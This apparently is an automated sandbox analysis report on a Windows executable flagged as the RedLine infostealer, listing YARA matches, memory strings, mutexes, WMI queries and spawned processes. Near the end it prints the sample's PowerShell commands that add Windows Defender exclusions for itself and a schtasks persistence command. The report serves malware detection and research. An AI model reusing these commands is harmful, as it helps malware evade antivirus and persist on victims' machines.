                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AA59F00_2_05AA59F0
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AA7A600_2_05AA7A60
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_05AA7A500_2_05AA7A50
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC87090_2_06EC8709
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECEAB80_2_06ECEAB8
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC5B980_2_06EC5B98
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC80C80_2_06EC80C8
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC71A80_2_06EC71A8
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD1400_2_06ECD140
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC06D00_2_06EC06D0
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD6280_2_06ECD628
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD61A0_2_06ECD61A
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC67A80_2_06EC67A8
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC8FA00_2_06EC8FA0
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECEF900_2_06ECEF90
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC8F910_2_06EC8F91
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECA7400_2_06ECA740
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECA7320_2_06ECA732
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC9F100_2_06EC9F10
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECA4A00_2_06ECA4A0
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECA4B00_2_06ECA4B0
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC9C490_2_06EC9C49
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC8DC10_2_06EC8DC1
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC85910_2_06EC8591
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC62000_2_06EC6200
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD3C90_2_06ECD3C9
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD3D80_2_06ECD3D8
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECE3D80_2_06ECE3D8
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC5B6D0_2_06EC5B6D
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECA3400_2_06ECA340
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECA3320_2_06ECA332
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC50AA0_2_06EC50AA
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC80B90_2_06EC80B9
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD8800_2_06ECD880
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC80960_2_06EC8096
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD8700_2_06ECD870
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06EC80030_2_06EC8003
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECD1300_2_06ECD130
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 0_2_06ECA9000_2_06ECA900
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_012AE7B08_2_012AE7B0
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_012ADC908_2_012ADC90
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_066696288_2_06669628
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_066644688_2_06664468
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_066612108_2_06661210
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_066633208_2_06663320
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_0666CD208_2_0666CD20
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeCode function: 8_2_0666DD008_2_0666DD00
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A780C810_2_06A780C8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A771A810_2_06A771A8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D14010_2_06A7D140
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7EAB810_2_06A7EAB8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A75B9810_2_06A75B98
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D62810_2_06A7D628
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D61910_2_06A7D619
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A767A810_2_06A767A8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7A73110_2_06A7A731
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7A74010_2_06A7A740
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7A4A010_2_06A7A4A0
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7A4B010_2_06A7A4B0
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D3CB10_2_06A7D3CB
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D3D810_2_06A7D3D8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7E3D810_2_06A7E3D8
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7A33110_2_06A7A331
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7A34010_2_06A7A340
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A750AB10_2_06A750AB
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7809710_2_06A78097
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A790C010_2_06A790C0
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A790D010_2_06A790D0
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7802B10_2_06A7802B
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7807310_2_06A78073
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D13010_2_06A7D130
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7EF9010_2_06A7EF90
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A79F1010_2_06A79F10
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A75B6D10_2_06A75B6D
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D88010_2_06A7D880
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7D87010_2_06A7D870
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 10_2_06A7A90010_2_06A7A900
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_0157E7B015_2_0157E7B0
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_0157DC9015_2_0157DC90
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_069B962815_2_069B9628
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_069B446815_2_069B4468
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_069B121015_2_069B1210
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_069B332015_2_069B3320
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_069BD10815_2_069BD108
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_069BDD0015_2_069BDD00
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_073DD05815_2_073DD058
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_073DA7D015_2_073DA7D0
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_073DD87815_2_073DD878
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeCode function: 15_2_073DD86A15_2_073DD86A
                  Source: Uv4EriqDCj.exeStatic PE information: invalid certificate
                  Source: Uv4EriqDCj.exe, 00000000.00000000.1695102438.0000000000646000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegcxR.exeD vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1751899883.0000000004212000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1750602650.0000000002B9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1751899883.000000000448A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1751899883.00000000039FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1746797252.0000000000A98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000000.00000002.1758253845.000000000A180000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameImplosions.exe4 vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002C51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exeBinary or memory string: OriginalFilenamegcxR.exeD vs Uv4EriqDCj.exe
                  Source: Uv4EriqDCj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.Uv4EriqDCj.exe.39fa250.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 8.2.Uv4EriqDCj.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPEMatched rule: infostealer_win_redline_strings author = Sekoia.io, description = Finds Redline samples based on characteristic strings, creation_date = 2022-09-07, classification = TLP:CLEAR, version = 1.0, id = 0c9fcb0e-ce8f-44f4-90b2-abafcdd6c02e
                  Source: 0.2.Uv4EriqDCj.exe.448ade8.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                  Source: 00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1751899883.000000000448A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 00000000.00000002.1751899883.00000000039FA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: 0000000A.00000002.1792920578.0000000003FCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: Uv4EriqDCj.exe PID: 4340, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: Uv4EriqDCj.exe PID: 7328, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Process Memory Space: nXUcBcEOyROdbV.exe PID: 7484, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
                  Source: Uv4EriqDCj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: nXUcBcEOyROdbV.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, Vscex5Iopq1ThZ6EeC.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, Vscex5Iopq1ThZ6EeC.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, Vscex5Iopq1ThZ6EeC.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, xjUj5Tg4fmJ50sNaKH.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                  Source: 0.2.Uv4EriqDCj.exe.4392a00.1.raw.unpack, xjUj5Tg4fmJ50sNaKH.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/107@1/2
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile created: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3428:120:WilError_03
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeMutant created: \Sessions\1\BaseNamedObjects\TfEIQKREVrBcbTKFqtAoWpOdW
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7184:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7348:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7692:120:WilError_03
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7764:120:WilError_03
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile created: C:\Users\user\AppData\Local\Temp\tmpA9D3.tmpJump to behavior
                  Source: Uv4EriqDCj.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: Uv4EriqDCj.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: Uv4EriqDCj.exe, 00000008.00000002.1861981750.0000000002E10000.00000004.00000800.00020000.00000000.sdmp, tmp61C3.tmp.15.dr, tmp61E4.tmp.15.dr, tmp98B5.tmp.15.dr, tmp6E25.tmp.8.dr, tmp3732.tmp.8.dr, tmp61E3.tmp.15.dr, tmp6E13.tmp.8.dr, tmp2AA4.tmp.15.dr, tmp6E24.tmp.8.dr, tmp6E35.tmp.8.dr, tmp98A4.tmp.15.dr, tmp3743.tmp.8.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: Uv4EriqDCj.exeVirustotal: Detection: 58%
                  Source: Uv4EriqDCj.exeReversingLabs: Detection: 56%
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeFile read: C:\Users\user\Desktop\Uv4EriqDCj.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\Uv4EriqDCj.exe "C:\Users\user\Desktop\Uv4EriqDCj.exe"
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\Uv4EriqDCj.exeProcess created: C:\Users\user\Desktop\Uv4EriqDCj.exe "C:\Users\user\Desktop\Uv4EriqDCj.exe"
